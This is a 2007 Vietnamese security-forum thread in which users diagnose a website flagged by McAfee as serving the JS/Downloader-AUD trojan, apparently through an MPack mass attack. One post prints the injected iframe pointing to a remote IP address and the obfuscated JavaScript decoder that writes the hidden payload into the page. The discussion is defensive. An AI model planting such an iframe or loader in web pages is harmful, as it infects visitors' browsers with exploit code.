Website chứa mã độc - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Website chứa mã độc

[Question] Website chứa mã độc	24/07/2007 00:06:12 (+0700) \| #1 \| 73357

tdnduongvn
Member

Joined: 18/01/2005 11:58:59
Messages: 9
Location: Heaven
Offline

Mình vừa vào trang http://www.maytinhth.com là máy tính cảnh báo đã lây nhiểm Trojan này

7/23/2007 10:21:11 AM Script execution blocked Administrator iexplore.exe http://www.maytinhth.com/home/component/option,com_hotproperty/task,view/id,35/Itemid,30/) Script executed by iexplore.exe JS/Downloader-AUD (Trojan)
7/23/2007 10:21:13 AM Deleted (Clean failed) TABLETPC2005\Administrator C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0OLIEV73\index[6].htm\0000001c.js JS/Downloader-AUD (Trojan)
7/23/2007 10:25:00 AM Deleted (Clean failed) TABLETPC2005\Administrator C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\2KK1IENT\index[2].htm\0000001c.js JS/Downloader-AUD (Trojan)
7/23/2007 10:25:00 AM Script execution blocked Administrator iexplore.exe http://www.maytinhth.com/home/component/option,com_contact/Itemid,3/) Script executed by iexplore.exe JS/Downloader-AUD (Trojan)

Vậy trojan này là gì ?? Phải chăng Website này đang chơi khăm??

[Question] Re: Website chứa mã độc	24/07/2007 00:26:27 (+0700) \| #2 \| 73362

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Các file .js downloader không thấy, chỉ thấy 1 trang quảng cáo to đùng thôi. Trình diệt nào đã cảnh báo như vậy bạn.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Re: Website chứa mã độc	24/07/2007 03:29:21 (+0700) \| #3 \| 73390

tdnduongvn
Member

Joined: 18/01/2005 11:58:59
Messages: 9
Location: Heaven
Offline

Hi,

Mình đang sử dụng Internet Explore 7, Detected by McAfee 8.5.

[Question] Website chứa mã độc	24/07/2007 05:13:30 (+0700) \| #4 \| 73412

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Tui đã thử bằng IE6, symantec, FH của mod, và mở source của trang đó, không thấy cái gì .js tải về và chạy trên máy tui, thử trên 3 máy khác nhau. Chỉ có mấy cái .js để dùng cho trang trí cái trang web quẳng cáo đó thôi.
Nếu mcafee của bạn có báo lỗi, bạn upload cái file .js đó lên forum để tham khảo.

PS: Edit lại , thấy đúng là có một file download từ 2 cái địa chỉ đó, quét online thấy có 3 chổ báo là code khai thác IE. Cũng đúng với tên mà mcafee báo downloader aud
Tiện thể hỏi thăm các cracker, coder html và bà con hiểu biết, nó là cái thứ gì
Cái file này được nhúng thêm vào ở cuối trang, sử dụng tag iframe

iframe src='http://81.95.145.240/go.php?sid..... /iframe

Nội dung

<script language=JavaScript>function decipher(x)var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,18,12,24,42,41,19,47,50,0,0,0,0,0,0,62,33,43,3,49,4,9,10,59,16,58,26,27,39,46,45,15,38,7,31,32,13,2,14,34,55,54,0,0,0,0,11,0,25,40,44,57,21,30,20,8,37,17,48,60,28,29,0,56,52,23,53,61,1,35,51,5,22,36);for(j=Math.ceil(l/b);j>0;j--)r='';for(i=Math.min(l,b);i>0;i--,l--)w|=(t[x.charCodeAt(p++)-48])<<s;if(s)r+=String.fromCharCode(165^w&255);w>>=8;s-=2elses=6document.write(r)decipher("xQ6Do8mqoStQZBlsrwUAx989IrhHsrhwyrpDFBcDWCmk_Q6X1Cl9jClsLV")</script>

PS: Edit lần 2, Mod Hoàng kiểm tra xem cái code đó, khi thực thi bằng IE, nó không được chặn bởi soft fh của mod. Nó có thể làm nhiệm vụ download cái file .js downloader ở phần đầu topic.

[Question] Website chứa mã độc	24/07/2007 08:00:45 (+0700) \| #5 \| 73474

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Có thể là cái trang đó bị mass attack rồi chèn malcious code vào dùng IFrame. Dạo này đang rộ lên cái tool MPack đó tmd.
Đọc thêm ở đây:
http://support.fire-lion.com/viewtopic.php?f=17&t=23

Còn về cái trang trên, có lẽ bị trục trặc sao đó nên cái file không load được về. Chỉ là 1 cái script khai thác, và nếu có sử dụng [FireLion] FastHelper thì sẽ vô hại.

[Question] Website chứa mã độc	28/07/2007 15:19:59 (+0700) \| #6 \| 74606

leejuaan
Member

Joined: 27/06/2007 20:23:14
Messages: 4
Offline

Chắc là xao. đẻ dọa mọi người hả...chả thâys reply lại cho anh em gì cả

[Question] Website chứa mã độc	29/07/2007 11:01:22 (+0700) \| #7 \| 74764

nobita 2.0
Member

Joined: 13/07/2007 12:23:54
Messages: 3
Offline

tmd wrote:

Cái file này được nhúng thêm vào ở cuối trang, sử dụng tag iframe

iframe src='http://81.95.145.240/go.php?sid..... /iframe

Mình cũng bị cái này, toàn bộ các site (khoảng 10 cái) đang chạy, "tự nhiên" đồng loạt xuất hiện cái đoạn mã đó trong code, cụ thể là trong file Index.php (cả ngoài lẫn trong admin folder).

Không biết cái đoạn mà đó nó có khai thác được gì cho mình không hay chỉ gây hại cho khách truy cập vào web mình thôi.

Mong các bác chỉ giáo. Em hoang mang quá!

[Question] Website chứa mã độc	02/08/2007 15:27:07 (+0700) \| #8 \| 76078

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

hosting server của bạn bị mass attack rồi. Hôm rồi ngay chính trên host của Hoàng cũng bị như vậy. Sau khi contact với supporters, account đã move sang server khác nên không còn bị nữa. Bạn thử liên lạc với supporter của host bạn và trình bày cho họ. Đây là mass attack của MPack (google for this subject)

[Question] Website chứa mã độc	04/08/2007 15:41:33 (+0700) \| #9 \| 76745

long_chao_hoi_sinh
Member

Joined: 04/08/2007 02:02:01
Messages: 1
Offline

sau 6 năm không đụng tới hack giờ đã thành cùi bắp.rất mừng vì hvaonline đã sống lại

Go to:

Users currently in here
1 Anonymous